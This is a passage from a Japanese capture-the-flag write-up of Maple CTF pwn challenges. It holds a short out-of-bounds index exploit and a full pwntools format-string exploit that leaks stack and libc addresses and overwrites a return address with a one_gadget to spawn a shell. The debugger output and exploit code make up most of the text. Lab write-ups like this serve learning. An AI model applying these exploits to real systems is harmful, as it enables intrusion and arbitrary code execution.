p=remote("no-flag-4-u.ctf.maplebacon.org",1337)

#gdb.attach(p)

def create(index, size, content):
    p.sendlineafter("5 : Exit","1")
    p.sendlineafter("index:",str(index))
    p.sendlineafter("size:",str(size))
    p.sendlineafter("content:",content)
    return

def edit(index,  content):
    p.sendlineafter("5 : Exit","2")
    p.sendlineafter("index:",str(index))
    p.sendlineafter("content:",content)
    return

def print(index):
    p.sendlineafter("5 : Exit","3")
    p.sendlineafter("index:",str(index))
    return p.recvline()

def delete(index):
    p.sendlineafter("5 : Exit","4")
    p.sendlineafter("index:",str(index))
    return

create(-2, 0x108, p64(0)+p64(elf.symbols["win"]))
p.sendlineafter("5 : Exit","5")
p.interactive()

printf (25 solve)

解けなかった。libc使って解くと楽なのだがlibcが配られていなかった。で、
どうやらwarmup2と同じlibcだった？ようだが、そこまでのメタ読みをしたら負けだよ…　
終了後にすぐ環境が使えなくなってしまったので、私の手元の環境、libc2.35で解いている。

頑張ってスタックピボットしようと思っていたが、面倒でやめてしまった。

ubuntu@ubuntu-virtual-machine:~/ctf/maplectf/printf$ ./chal 
%p %p %p
0x7fd2d1e7eb23 0xfbad208b 0x7fd2d1d79992

実行すると一回だけ読み込めて、FSBがある。

pwndbg> checksec
[*] '/home/ubuntu/ctf/maplectf/printf/chal'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

またPIE有効かよ。勘弁してくれ。

pwndbg> tel 0x7fffffffdf68 30
00:0000│     0x7fffffffdf68 —▸ 0x7fffffffdf90 —▸ 0x7fffffffdfa0 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— ...
01:0008│     0x7fffffffdf70 —▸ 0x7fffffffe0d8 —▸ 0x7fffffffe3ee ◂— '/home/ubuntu/ctf/maplectf/printf/chal'
02:0010│     0x7fffffffdf78 —▸ 0x55555555520a (main) ◂— endbr64 
03:0018│     0x7fffffffdf80 ◂— 0x0
04:0020│ rsp 0x7fffffffdf88 —▸ 0x5555555551dd (go+52) ◂— nop    
05:0028│ rbp 0x7fffffffdf90 —▸ 0x7fffffffdfa0 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— 0x1
06:0030│     0x7fffffffdf98 —▸ 0x5555555551f2 (set+18) ◂— nop    
07:0038│     0x7fffffffdfa0 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— 0x1
08:0040│     0x7fffffffdfa8 —▸ 0x555555555207 (ready+18) ◂— nop    
09:0048│     0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— 0x1
0a:0050│     0x7fffffffdfb8 —▸ 0x55555555524e (main+68) ◂— mov    eax, 0
0b:0058│     0x7fffffffdfc0 ◂— 0x1
0c:0060│     0x7fffffffdfc8 —▸ 0x7ffff7dabd90 (__libc_start_call_main+128) ◂— mov    edi, eax

スタックはここら辺を操作できる。

ちなみに、

6番目 05:0028│ rbp 0x7fffffffdf90 —▸ 0x7fffffffdfa0 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— 0x1

8番目 07:0038│ 0x7fffffffdfa0 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfc0 ◂— 0x1

である。

なお、書き込まれるバッファは、スタック内に無い。
こういう時、どうすれば、リターンアドレスを書き換えることができるか…
イメージ的は、
・6番目の値に対して%nをして8のポインタを書き換えて、0x7fffffffdf88に向ける。
・8番目の値に対して%nをして、リターンアドレスを書き換える

これをやれば、リターンアドレスが書き換えらえると思うだろうけど、この多段FSBにはちょっとやり方に工夫が必要。
これをやる方法が下記の書籍に紹介されてるので、今すぐ10冊買い、5等身以内の親族に教えてあげよう。

www.amazon.co.jp

さて、多段fsbを行えば、無限ループさせることができる。
あとは自分のペースでone_gadgetを書けばいいだけ。
私は17番目の値と47番目の値を使って、リターンアドレスをone_gadgetに書き換えた。

0xebcf5 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

このone_gadgetを使った。条件を満たすために、最後にnullを書き込んでいる。

ブルートフォース要素があるので、何発も繰り返すといつかshellが取れる。

from pwn import *
import math
import warnings
warnings.simplefilter('ignore')


elf=ELF("/home/ubuntu/ctf/maplectf/printf/chal")

p=process("/home/ubuntu/ctf/maplectf/printf/chal"
          , aslr=True)

#gdb.attach(p)

p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p")

tmp=p.recvline().split()
print(tmp)
stack_leak=int(tmp[3], 16)
proc_base=int(tmp[4], 16)-0x1207
libc_base=int(tmp[8], 16)-0x29D90

log.info("stack_leak:"+hex(stack_leak))
log.info("proc_base:"+hex(proc_base))
log.info("libc_base:"+hex(libc_base))


# lower
log.info("write lower bit of one_gadget start")
stack=((stack_leak+0x10)%0x10000) -0xe5
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%17$hn".format(stack))

# overwrite 0x7fffffffde58
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%47$p") # kore ga naito nazeka ugokanai
one_gadget=libc_base+0xebcf5
lower=(one_gadget % 0x10000) - 0xe5
print(lower)
log.info(hex(one_gadget))
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%47$hn".format(lower))


# middle
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%17$hn".format(stack+2))

middle=((one_gadget % 0x100000000)//0x10000) - 0xe5
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%47$hn".format(middle))
log.info("write middlebit of one_gadget end")

# higher
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%17$hn".format(stack+4))

higher=(one_gadget // 0x100000000) - 0xe5
p.sendline("%c%c%c%c%68c%hhn%157c%8$hhn%{}c%47$n".format(higher))
log.info("write higherbit of one_gadget end")
p.sendline(b"\x00"*0x100)

p.sendline("ls")
p.interactive()

FSBは嫌い。まじで。

問題の難易度はほど良くてよかった。

EBCSICは時間があるときに復習しよう。